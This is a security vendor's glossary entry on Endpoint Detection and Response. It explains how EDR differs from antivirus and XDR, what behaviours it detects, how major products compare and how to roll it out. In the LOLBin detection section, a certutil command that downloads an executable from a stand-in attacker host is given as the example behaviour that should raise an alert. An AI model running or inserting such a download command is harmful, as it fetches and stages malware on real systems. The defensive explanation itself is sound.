Skip to content

Services, Wiki-Artikel, Blog-Beiträge und Glossar-Einträge durchsuchen

↑↓NavigierenEnterÖffnenESCSchließen
Endpoint Security Glossary

Endpoint Detection and Response (EDR) - Verhaltensbasierter Endpunktschutz

EDR (Endpoint Detection and Response) goes beyond traditional antivirus: instead of simply comparing signatures, EDR analyzes process behavior in real time. It detects fileless malware, lateral movement, memory injection, and LOLBin abuse. Key products: Microsoft Defender for Endpoint, CrowdStrike Falcon, SentinelOne, Palo Alto Cortex XDR. XDR (Extended Detection and Response) extends EDR to include network, cloud, and identity into a unified platform.

EDR solves the core problem of traditional antivirus: signatures only detect known threats. Modern attackers easily bypass signatures—through obfuscation, polymorphism, or fileless attacks. EDR monitors WHAT a process does, not HOW it looks.

EDR vs. Antivirus vs. XDR

Generation 1: Antivirus (AV)

  • Method: Signature comparison (hash/pattern)
  • Detects: known malware
  • Blind to: new malware, obfuscation, fileless attacks
  • Response: Delete/quarantine file

Ease of bypass: A single modified byte results in a new hash with no match. Base64 encoding of a PowerShell script also produces no match. Living-off-the-land (certutil, mshta) does not trigger antivirus detection.

Generation 2: NGAV (Next-Gen AV)

  • Method: ML + static analysis + signatures
  • Detects: known + unknown malware families
  • Blind to: behavioral anomalies, memory-only attacks

Generation 3: EDR

  • Method: Behavioral monitoring of all processes
  • Detects: fileless attacks, injection, LOLBins, memory manipulation
  • Views: Process tree diagram (who spawned whom?)
  • Response: Isolation, kill, forensic snapshot

Generation 4: XDR (Extended Detection and Response)

  • Method: Correlation across endpoint + network + cloud + identity
  • Detects: complex multi-stage attacks
  • Example: Endpoint alert + cloud login anomaly = an incident
  • Products: Microsoft Defender XDR, Palo Alto Cortex XDR

EDR Core Capabilities

CapabilityDescription
TelemetryAll processes, network connections, registry changes
DetectionBehavioral rules + ML + Threat Intel IOCs
InvestigationVisualize attack tree (parent→child processes)
ResponseIsolation, process kill, remote forensics
HuntingProactive search for indicators of compromise

Core EDR Detections

Process Injection

  • Injecting code into a foreign process (e.g., svchost.exe)
  • Techniques: CreateRemoteThread, Process Hollowing, DLL Injection
  • EDR detects anomalous memory write operations in third-party processes
  • Event: suspicious memory allocation + execution in svchost.exe

LOLBin (Living-off-the-Land)

Abuse of legitimate Windows tools such as mshta.exe, regsvr32.exe, certutil.exe, rundll32.exe.

Example rule: Alert if certutil.exe is called with a URL parameter (download indicator):

certutil.exe -urlcache -split -f http://evil.com/malware.exe

Legitimate use is rare – an alert is triggered immediately.

Fileless Malware

  • Only in RAM – no file on disk
  • PowerShell: encoded command + AMSI bypass
  • Reflective DLL Loading: Load DLL directly into memory
  • EDR detects PowerShell process with Base64 content → Alert

AMSI Bypass Detection

  • Attacker patches AMSI (AntiMalware Scan Interface) in RAM
  • EDR detects memory write to AMSI.dll region → immediate alert

Signed Binary Abuse (DLL Hijacking)

  • Signed binary with malicious side-DLL
  • EDR detects DLL from unexpected location → alert

Persistence Detection

EDR detects and alerts for all common persistence techniques:

  • Registry Run key (HKCU\Software\Microsoft\Windows\CurrentVersion\Run)
  • Scheduled task created
  • WMI event subscription
  • Startup folder

EDR Products Compared

Microsoft Defender for Endpoint (MDE)

Strengths:

  • Native Windows integration (deep within the OS)
  • M365/Entra integration: Identity + Endpoint
  • Attack Surface Reduction (ASR) Rules
  • Defender Antivirus integrated
  • Microsoft Sentinel: seamless SIEM integration
  • Cost-effective for Microsoft shops (in the E5 bundle)

Weaknesses:

  • Mac/Linux: less mature than Windows
  • Lower telemetry granularity than CrowdStrike

Costs: Defender for Business approx. 3 EUR/user/month (SMB); E5 bundle approx. 52 EUR/user/month (all-inclusive)

CrowdStrike Falcon

Strengths:

  • Market leader in the EDR industry (Gartner Magic Quadrant)
  • OverWatch: 24/7 threat hunting by the CrowdStrike team
  • Best cross-platform coverage (Windows/Mac/Linux)
  • Threat Graph: global threat intelligence from millions of sensors

Weaknesses:

  • Very expensive
  • Noted: In July 2024, a sensor update caused a global BSOD outage

Lesson learned: Testing updates before a global rollout is mandatory.

SentinelOne Singularity

Strengths:

  • Fully automated remediation (no analyst required)
  • Storyline: Attack graph is automatically generated
  • Autonomous Response: isolates, kills, and rolls back without human intervention
  • Singularity XDR: SIEM + EDR integrated

Particularly suitable for companies that prioritize automation.

Palo Alto Cortex XDR

  • Strong network integration (Prisma + XDR)
  • Well-suited if NGFW is already from Palo Alto
  • Very comprehensive, complex to operate

EDR Implementation: Rollout Strategy

Phase 1: Pilot Group (Weeks 1–4)

  • 50–100 computers (IT department, non-critical systems)
  • Monitoring mode: alerts only, no blocking
  • Tuning: identify and exclude false positives
  • Baseline: learn normal activity patterns

Phase 2: Expanded pilot group (Weeks 5–8)

  • 500 computers (various departments)
  • Activate first block rules (high-confidence detections only)
  • Integrate help desk: Employees report EDR blocks
  • Escalation path: SOC analyst → IT admin → Help desk

Phase 3: Full rollout (Months 3–6)

  • All endpoints + servers
  • Activate advanced rules (after baseline learning)
  • Automated response: critical threats are immediately isolated

False Positive Management

The first 4 weeks: alert only, no block. Afterward, gradually enable blocking for high-confidence rules. IT is aware of legitimate exceptions (monitoring tools).

Common False Positives:

  • Backup software: reads many files → may trigger ransomware detection
  • Developer tools: code injection during debugging → EDR alert possible
  • Automated tests: exploit code in test environments

EDR Telemetry for SIEM

  • EDR delivers high-quality events to the SIEM (CEF/Syslog)
  • Correlation: EDR alert + SIEM context = better triage
  • Example: EDR alert “Kerberoasting” + AD event 4769 = joint incident